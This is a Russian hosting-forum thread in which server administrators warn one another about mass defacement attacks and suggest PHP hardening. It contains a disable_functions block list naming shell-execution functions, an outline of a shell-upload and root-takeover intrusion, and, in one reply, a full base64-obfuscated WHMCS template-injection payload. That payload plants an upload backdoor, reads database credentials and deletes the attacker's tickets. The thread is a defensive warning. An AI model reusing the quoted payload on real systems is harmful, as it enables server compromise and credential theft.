Форум Сайтостроение Хостинг

Будьте внимательны, безработные взломщики балуются ;)

1234567 8
LineHost
На сайте с 20.01.2007
Offline
339
LineHost
8340

Доброго времени суток.

Проверьте на своих серверах php настройки и те кто обычно не особо вредные позакрывайте хотя бы на время: 

disable_functions = show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open, allow_url_fopen,ini_set

Какие то идиоты с IP Саудовской Аравии банально заливает шелл у всех подряд и стирает корень (и не только если получает права) всех доменов и в индексы прописывает:

Owned By 04 hrb

Заливает просто туда, где разрешается любой формой, потом запускает perl скрипт. По всей видимости получает пароль с /etc/shadow, дальше банально подключается как root по ssh и ручками шарит по конфигам (в логе действий видны ошибки набора). Три раза поймал на ходу, два сервера спас, один увы приходится переустанавливать /etc пустой ;)

Пользуется: 

$VERSION="Version 0.1 by LorD";

$about =

"\n\e[32m--== [ \e[31mIRAN HACKERS SABOATGE  Tools for Mass Defacement $VERSION \e[32m] ==--\e[m\n".

Скрипт скачивает с spaceflite_com

SERV.LT - Стабильные услуги хостинга, KVM VPS в Литве, Франции. (https://www.serv.lt/ru/vps/kvm/) Недорогие выделенные серверы (https://www.serv.lt/ru/dedicated-lt/) в Литве.
О
На сайте с 04.08.2009
Offline
145
Окей
#1

Немного с гугла.

---------- Добавлено в 03:56 ---------- Предыдущее сообщение было в 03:53 ----------

+ еще с гугла

Влазить напрямую в базу — это невозможно © Игорь Белов, mchost.ru
Andreyka
На сайте с 19.02.2005
Offline
822
Andreyka
#2

А что, еще где то пускают рута по паролям?

Я думал что ssh key уже стало стандартом де факто

Не стоит плодить сущности без необходимости
ware
На сайте с 12.09.2010
Offline
406
ware
#3

LineHost, Я Ваш сервер всё равно без проблем ломану :)

Например, в cron добавь команду ls с выводом в файл и получаешь то, что нужно :)

---------- Добавлено в 10:03 ---------- Предыдущее сообщение было в 10:03 ----------

Andreyka:
А что, еще где то пускают рута по паролям?

Да там как, права на файлах от фонаря взяты, можно читать конфигурационные файлы даже не будучи root.

Новая версия редактора AdWords Как создавался Яндекс.Диск Новый инструмент от Пиксель
Andreyka
На сайте с 19.02.2005
Offline
822
Andreyka
#4

Тереть то только от рута можно

[Удален]
#5

Подтверждаю, у клиента сервер ломанули, осталось от оси только mnt proc и tmp все остальное под чистую.

sumar
На сайте с 22.11.2005
Offline
140
sumar
#6

+1

через тикеты(WHMCS) периодически арабы из саудовской аравии пытаются вставлять код свой :)

утренний свежак:

Subject: {php}eval(base64_decode('JGMwZGUgID0gYmFzZTY0X2RlY29kZSgnUEQ5d2FIQU5DbWxtS0dsemMyVjBLQ1JmVUU5VFZGc25VM1ZpYldsMEoxMHBLWHNOQ2lBZ0lDQWtabWxzWldScGNpQTlJQ0lpT3lBTkNpQWdJQ0FrYldGNFptbHNaU0E5SUNjeU1EQXdNREF3SnpzTkNnMEtJQ0FnSUNSMWMyVnlabWxzWlY5dVlXMWxJRDBnSkY5R1NVeEZVMXNuYVcxaFoyVW5YVnNuYm1GdFpTZGRPdzBLSUNBZ0lDUjFjMlZ5Wm1sc1pWOTBiWEFnUFNBa1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkMGJYQmZibUZ0WlNkZE93MEtJQ0FnSUdsbUlDaHBjM05sZENna1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkdVlXMWxKMTBwS1NCN0RRb2dJQ0FnSUNBZ0lDUmhZbTlrSUQwZ0pHWnBiR1ZrYVhJdUpIVnpaWEptYVd4bFgyNWhiV1U3RFFvZ0lDQWdJQ0FnSUVCdGIzWmxYM1Z3Ykc5aFpHVmtYMlpwYkdVb0pIVnpaWEptYVd4bFgzUnRjQ3dnSkdGaWIyUXBPdzBLSUNBTkNtVmphRzhpUEdObGJuUmxjajQ4WWo1RWIyNWxJRDA5UGlBa2RYTmxjbVpwYkdWZmJtRnRaVHd2WWo0OEwyTmxiblJsY2o0aU93MEtmUTBLZlEwS1pXeHpaWHNOQ21WamFHOG5EUW84Wm05eWJTQnRaWFJvYjJROUlsQlBVMVFpSUdGamRHbHZiajBpSWlCbGJtTjBlWEJsUFNKdGRXeDBhWEJoY25RdlptOXliUzFrWVhSaElqNDhhVzV3ZFhRZ2RIbHdaVDBpWm1sc1pTSWdibUZ0WlQwaWFXMWhaMlVpUGp4cGJuQjFkQ0IwZVhCbFBTSlRkV0p0YVhRaUlHNWhiV1U5SWxOMVltMXBkQ0lnZG1Gc2RXVTlJbE4xWW0xcGRDSStQQzltYjNKdFBpYzdEUXA5RFFvL1BpQT0nKTsNCg0KJGYwcDNuID0gZm9wZW4gKCd0ZW1wbGF0ZXNfYy9pbmRleHgucGhwJywnYScpOw0KDQokd3JpdCAgPSBmd3JpdGUoJGYwcDNuICwgJGMwZGUpOw0KDQppZiAoJHdyaXQpIHsNCiAgICBlY2hvICc8Y2VudGVyPjxiPjxmb250IGNvbG9yPXJlZCA+RG9uZSAuLi4gR28gPT4gZG93bmxvYWRzL2luZGV4eC5waHAgOyknOw0KICAgIGZjbG9zZSgkd3JpdCk7DQp9IGVsc2Ugew0KICAgIGVjaG8gJ0Vycm9yICEhJzsNCn0NCiR0ZXh0PWZpbGVfZ2V0X2NvbnRlbnRzKCJjb25maWd1cmF0aW9uLnBocCIpOw0KJHRleHQ9IHN0cl9yZXBsYWNlKCI8P3BocCIsICIiLCAkdGV4dCk7DQokdGV4dD0gc3RyX3JlcGxhY2UoIjw/IiwgIiIsICR0ZXh0KTsNCiR0ZXh0PSBzdHJfcmVwbGFjZSgiPz4iLCAiIiwgJHRleHQpOw0KZXZhbCgkdGV4dCk7DQokZGI9bXlzcWxfY29ubmVjdCgkZGJfaG9zdCwkZGJfdXNlcm5hbWUsJGRiX3Bhc3N3b3JkKSBvciBkaWUoIkNhbid0IG9wZW4gY29ubmVjdGlvbiB0byBNeVNRTCIpOw0KbXlzcWxfc2VsZWN0X2RiKCRkYl9uYW1lKSBvciBkaWUoIkNhbid0IHNlbGVjdCBkYXRhYmFzZSIpOw0KJGRlbGV0ZSA9IkRFTEVURSBmcm9tIHRibHRpY2tldHMgV0hFUkUgdGl0bGUgbGlrZSAweDI1N0I3MDY4NzA3RDI1OyI7DQpteXNxbF9xdWVyeSgkZGVsZXRlKTs='));{/php}
выделенные серверы - https://masterdedicated.com/ (https://masterdedicated.com/) доменные имена за приятную цену - только тут (https://masterdedicated.com/foru/announcements.php?id=2)
LineHost
На сайте с 20.01.2007
Offline
339
LineHost
#7
ware:
LineHost, Я Ваш сервер всё равно без проблем ломану :)

Я хотел писать, что крутые админы шли бы лесом, но как то воздержался. Думал что они тоже воздержутся. В Вашем месте не был таким самоуверенным, некоректно, мой опыт Вашего больше минумум на лет десять....

Веб-сайт на англ. и о беспонтовых каталожниках Угроза бана в Adsense.
iHead
На сайте с 25.04.2008
Offline
137
iHead
#8

непонятно, чем show_source не угодил, allow_url_fopen вообще не является функцией :)

эффективнее: open_basedir + запрет на выполнение команд ОС + работа скриптов от непривилегированного пользователя (пользователей).

Рекомендуемый хостинг партнер 1С-Битрикс (https://www.ihead.ru/bitrix/), PHP-хостинг (https://www.ihead.ru/php/), доверенный партнер RU-CENTER (https://www.ihead.ru/news/573.html), официальный представитель REG.RU в Кирове (https://www.ihead.ru/news/851.html)
LineHost
На сайте с 20.01.2007
Offline
339
LineHost
#9
Andreyka:
Тереть то только от рута можно

Это и коню понятно. Года три - четыре тому назад давал Вашему величеству доступ до аналогичного сервера (ssh в том числе, так как тоже доказывали что взломаете за три минуты), чтоб ломанули его, но как то не укусили. А вот арабы ломанули ;)

Не надо быть таким самоуверенным ув. Andreyka, мы тоже хоть и не с Одессы, но не совсем глупые ;)

P.S. Я написал чётко, что хочу информировать других, чтоб были осторожны, возможно кто то ещё поделится опытом по конкретному вопросу. А такие суппер пупер админы прошу проходить мимо, я лично вижу вашей работы больше чем вы желаете, так что успокойтесь и не заставляйте высказыватся ;)

eServer.ru прикольно отожгли, стоит Ап PR 26.07.2008 может Посоветуйте ВПС
ware
На сайте с 12.09.2010
Offline
406
ware
#10
LineHost:
Я хотел писать, что крутые админы шли бы лесом, но как то воздержался. Думал что они тоже воздержутся. В Вашем месте не был таким самоуверенным, некоректно, мой опыт Вашего больше минумум на лет десять....

Я не крутой админ, не переживайте, я Вам рассказал, что Ваше решение - не панацея :)

1234567 8

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий